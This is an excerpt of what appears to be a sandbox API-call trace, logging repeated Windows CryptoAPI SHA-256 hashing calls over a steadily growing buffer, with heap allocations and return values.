	[0214.463] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27336b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27336b0, pdwDataLen=0x128ba4) returned 1
	[0214.463] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.463] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.463] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.463] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.463] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x660, dwFlags=0x0) returned 1
	[0214.463] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27336d8
	[0214.463] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27336d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27336d8, pdwDataLen=0x128ba4) returned 1
	[0214.463] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.463] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.463] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.464] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.464] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x680, dwFlags=0x0) returned 1
	[0214.464] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733700
	[0214.464] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733700, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733700, pdwDataLen=0x128ba4) returned 1
	[0214.464] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.464] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.464] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.464] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.464] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x6a0, dwFlags=0x0) returned 1
	[0214.464] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.464] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733728
	[0214.464] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733728, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733728, pdwDataLen=0x128ba4) returned 1
	[0214.464] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.465] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.465] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.465] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.465] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x6c0, dwFlags=0x0) returned 1
	[0214.465] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.465] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733750
	[0214.465] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733750, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733750, pdwDataLen=0x128ba4) returned 1
	[0214.465] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.465] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.465] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.465] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.466] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x6e0, dwFlags=0x0) returned 1
	[0214.466] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733778
	[0214.466] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733778, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733778, pdwDataLen=0x128ba4) returned 1
	[0214.466] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.466] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.466] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.466] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.466] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x700, dwFlags=0x0) returned 1
	[0214.466] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.466] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27337a0
	[0214.466] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27337a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27337a0, pdwDataLen=0x128ba4) returned 1
	[0214.466] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.466] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.466] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.467] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.467] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0214.467] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27337c8
	[0214.467] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27337c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27337c8, pdwDataLen=0x128ba4) returned 1
	[0214.467] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.467] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.467] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.467] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.467] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0214.467] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.467] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27337f0
	[0214.467] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27337f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27337f0, pdwDataLen=0x128ba4) returned 1
	[0214.467] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.467] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.467] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.468] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.468] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0214.468] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733818
	[0214.468] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733818, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733818, pdwDataLen=0x128ba4) returned 1
	[0214.468] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.468] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.468] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.468] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.468] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0214.468] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.468] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733840
	[0214.468] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733840, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733840, pdwDataLen=0x128ba4) returned 1
	[0214.468] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.468] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.468] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.469] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.469] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0214.469] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.469] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733868
	[0214.469] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733868, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733868, pdwDataLen=0x128ba4) returned 1
	[0214.469] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.469] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.469] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.516] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.516] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0214.516] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.516] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733890
	[0214.516] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733890, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733890, pdwDataLen=0x128ba4) returned 1
	[0214.516] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.516] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.516] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.517] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.517] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0214.517] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.517] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27338b8
	[0214.517] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27338b8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27338b8, pdwDataLen=0x128ba4) returned 1
	[0214.517] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.517] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.517] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.517] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.517] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0214.517] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27338e0
	[0214.518] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27338e0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27338e0, pdwDataLen=0x128ba4) returned 1
	[0214.518] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.518] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.518] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.518] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.518] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0214.518] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.518] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733908
	[0214.518] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733908, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733908, pdwDataLen=0x128ba4) returned 1
	[0214.518] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.518] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.518] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.519] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.519] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0214.519] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733930
	[0214.519] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733930, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733930, pdwDataLen=0x128ba4) returned 1
	[0214.519] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.519] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.519] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.519] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.519] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0214.519] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.519] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733958
	[0214.519] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733958, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733958, pdwDataLen=0x128ba4) returned 1
	[0214.519] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.519] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.519] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.520] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.520] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0214.520] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733980
	[0214.520] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733980, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733980, pdwDataLen=0x128ba4) returned 1
	[0214.520] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.520] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.520] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.520] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.520] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0214.520] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.520] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27339a8
	[0214.520] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27339a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27339a8, pdwDataLen=0x128ba4) returned 1
	[0214.520] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.520] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.520] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.521] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.521] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0214.521] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27339d0
	[0214.521] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x27339d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27339d0, pdwDataLen=0x128ba4) returned 1
	[0214.521] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.521] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.521] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.521] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.521] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0214.521] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27339f8
	[0214.521] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x27339f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27339f8, pdwDataLen=0x128ba4) returned 1
	[0214.521] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.521] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.521] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.522] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.522] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0214.522] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733a20
	[0214.522] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733a20, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733a20, pdwDataLen=0x128ba4) returned 1
	[0214.522] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.522] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.522] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.522] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.522] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0214.522] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.522] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733a48
	[0214.523] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733a48, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733a48, pdwDataLen=0x128ba4) returned 1
	[0214.523] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.523] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.523] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.523] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.523] CryptHashData (hHash=0x22b6a40, pbData=0x2763c58, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0214.523] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.523] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733a70
	[0214.523] CryptGetHashParam (in: hHash=0x22b6a40, dwParam=0x2, pbData=0x2733a70, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733a70, pdwDataLen=0x128ba4) returned 1
	[0214.523] CryptDestroyHash (hHash=0x22b6a40) returned 1
	[0214.523] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
	[0214.523] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225968) returned 1
	[0214.524] CryptCreateHash (in: hProv=0x225968, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0214.524] CryptHashData (hHash=0x22b6c00, pbData=0x2763c58, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0214.524] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0214.524] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2733a98
	[0214.524] CryptGetHashParam (in: hHash=0x22b6c00, dwParam=0x2, pbData=0x2733a98, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2733a98, pdwDataLen=0x128ba4) returned 1
	[0214.524] CryptDestroyHash (hHash=0x22b6c00) returned 1
	[0214.524] CryptReleaseContext (hProv=0x225968, dwFlags=0x0) returned 1
